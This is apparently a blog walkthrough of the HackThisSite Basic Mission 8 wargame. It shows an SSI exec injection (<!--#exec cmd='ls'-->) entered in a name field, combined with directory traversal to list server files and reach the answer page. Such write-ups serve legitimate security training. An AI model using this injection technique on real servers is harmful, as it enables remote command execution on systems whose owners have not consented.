Basic Mission 8
When a name is entered, the system creates a file in /basic/8/tmp/randomjunk.shtml with some irrelevant information in it. If you Google for “.shtml” you’ll see that that is an extension for Server Side Include executables.
Goggling for “ssi exec” you’ll find that <pre</pre> will return the output from running “command”. We know that this is a Linux/Unix server from the directory style, starting with “/” instead of “C:”, so we’ll use the “ls” command to list the contents of the directory. Put “<!–#exec cmd=”ls” –>” as your name and then go to the created file.
You should see a list of randomly named files in the name area like
1 2 3 4 5 6 7 8 9 10 11 |
<table class="alignleft" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top" width="638"> <b>Hi, tshngmww.shtml hipykpqu.shtml ztxdhjxn.shtml avpfeoie.shtml fviqpmaw.shtml kqbybdzc.shtml dzrnmzgx.shtml npcsygfl.shtml whqxxojt.shtml ylomcmvu.shtml uhdppswp.shtml gzntiicx.shtml dzwbqiuu.shtml qvzuieng.shtml smcerykh.shtml qjhnmhmq.shtml znodwztr.shtml!</b> <b> </b> <b>Your name contains 254 characters.</b> </td> </tr> </tbody> </table> |
Using the combination of this and directory transversals (google it – “.” is the current directory, “..” is one directory up) we can go from webroot/missions/basic/8/tmp/ to webroot/missions/basic/8/ without having to specify the full path.
Put “<!–#exec cmd=”ls ..” –> ”as your name and then go to the created file. You should see a list of randomly named files in the name area like
1 2 3 4 5 6 7 8 9 10 |
<table class="alignleft" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top" width="638"> <b>Hi, au12ha39vc.php index.php level8.php tmp!</b> <b>Your name contains 39 characters.</b> </td> </tr> </tbody> </table> |
Voila you have made it .Now just head @ http://www.hackthissite.org/missions/basic/8/au12ha39vc.php. If you have better solution than this do not forget to push your code to the comment section.
Leave a Reply